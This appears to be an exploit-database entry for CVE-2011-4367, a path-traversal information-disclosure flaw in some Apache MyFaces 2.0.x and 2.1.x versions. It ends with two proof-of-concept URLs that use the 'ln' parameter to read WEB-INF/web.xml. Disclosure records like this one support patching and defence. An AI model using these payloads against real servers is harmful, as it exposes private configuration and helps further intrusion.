Apache MyFaces - 'ln' Information Disclosure
| EKU-ID: 41221 | CVE: CVE-2011-4367;OSVDB-79002 | OSVDB-ID: |
| Author: Paul Nicolucci | Published: 2012-02-09 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 41221 | CVE: CVE-2011-4367;OSVDB-79002 | OSVDB-ID: |
| Author: Paul Nicolucci | Published: 2012-02-09 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/51939/info Apache MyFaces is prone to a remote information-disclosure vulnerability. Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks. The following versions are affected: Apache MyFaces 2.0.1 through 2.0.11 Apache MyFaces 2.1.0 through 2.1.5 http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF